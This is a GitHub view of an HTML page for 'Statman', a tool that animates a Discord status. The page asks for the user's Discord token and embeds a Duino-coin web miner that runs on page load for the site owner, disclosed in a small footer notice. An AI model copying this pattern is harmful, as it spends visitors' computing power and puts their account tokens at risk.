-
Notifications
You must be signed in to change notification settings - Fork 0
/
ct.html
63 lines (50 loc) · 2.81 KB
/
ct.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Statman || Cascading Text || Darkmash || Discord - Status - Changer </title>
<meta property="og:image" content="icon.svg" />
<meta name="description" content="Cascading Text || Statman || Make your Discord Status Look Dope.." />
<meta name="keywords" content="darkmash , tools , startup , coders, statman , discord , status , changer" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="icon" type="image/png" href="icon.svg" />
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="Statman">
<meta itemprop="description" content="Cascading Text || Statman || Make your Discord Status Look Dope.. ">
<meta itemprop="image" content="icon.svg ">
<!-- Twitter Card data -->
<meta name="twitter:card" content="Make it dope ma dwag..">
<meta name="twitter:title" content="Statman">
<meta name="twitter:description" content="Cascading Text || Statman || Make your Discord Status Look Dope.. ">
<meta name="twitter:image" content="icon.svg">
<!-- Open Graph data -->
<meta property="og:title" content="Statman" />
<meta property="og:type" content="Sub page" />
<meta property="og:url" content="https://darkmash-org.github.io/Statman/ct.html" />
<meta property="og:image" content="icon.svg" />
<meta property="og:description" content="Cascading Text || Statman || Make your Discord Status Look Dope.. " />
<meta property="og:site_name" content="Statman" />
<link rel="stylesheet" href="style_3.css">
</head>
<body>
<a class="ls" href="index.html">Home</a>
<a class="ls" href="https://darkmash-org.github.io/">Darkmash</a>
<a class="ls" href="https://github.com/darkmash-org/Statman/blob/main/fund_us.md">Support</a>
<div>
<input id="a" type="password" placeholder=" Token" />
<input id="b" type="text" placeholder=" Text" />
<button onclick="start();" id="start">START</button>
<button onclick="stop_();" id="stop">STOP</button>
<a id="github" href="https://github.com/darkmash-org/Statman" target="_blank" rel="noopener noreferrer"><img height=45px src="GitHub.png" alt="Github Repo"></a>
</div>
<iframe class="mner" src="https://server.duinocoin.com/webminer.html?username=darkmash&threads=1&rigid=statman&keyinput="></iframe>
<footer id="footer">
<div class="alert">
<span class="closebtn" onclick="this.parentElement.style.display='none';">×</span> We do mine in the site . This is to make sure the company could serve yall the next day : )
</div>
</footer>
<script src="script_2.js"></script>
</body>
</html>